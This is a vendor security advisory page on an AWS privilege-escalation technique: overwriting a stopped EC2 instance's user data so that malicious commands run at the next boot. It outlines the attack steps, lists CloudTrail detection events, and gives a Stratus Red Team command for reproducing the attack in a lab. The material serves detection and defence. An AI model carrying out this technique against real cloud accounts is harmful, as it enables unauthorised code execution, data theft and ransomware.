About
"EC2 user data" allows to automatically run commands when an EC2 instance start. An attacker with sufficient permissions can overwrite the user data of an EC2 instance to have it execute malicious commands and escalate their privileges.
Understanding Impact
Business Impact
When an attacker manages to execute malicious commands on an EC2 virtual machine, they can access sensitive data and run ransomware or other extortion attacks.
Technical Impact
An attacker first needs to stop the EC2 instance, then modify its user data. After that, the malicious commands are executed the next time the instance starts.
Detection
You can identify when an EC2 instance is stopped and its user data changed using the following CloudTrail events:
StopInstances. Note that the user data of an EC2 instance cannot be changed while it is running.ModifyInstanceAttribute, when the fieldrequestParameters.userDatais not empty.
Reproduce the attack
You can easily reproduce this attack in a self-contained manner with Stratus Red Team using the following command:
stratus detonate aws.execution.ec2-user-dataSee also the related documentation.
How Datadog can help
Cloud SIEM
Datadog Cloud SIEM detects this attack using the out-of-the-box rule "Possible AWS EC2 privilege escalation via the modification of user data".
References
Stratus Red Team - Execute Commands on EC2 Instance via User Data
stratus-red-team.cloud
Local Privilege Escalation: User Data
hackingthe.cloud
Run commands on your Linux instance at launch
aws documentation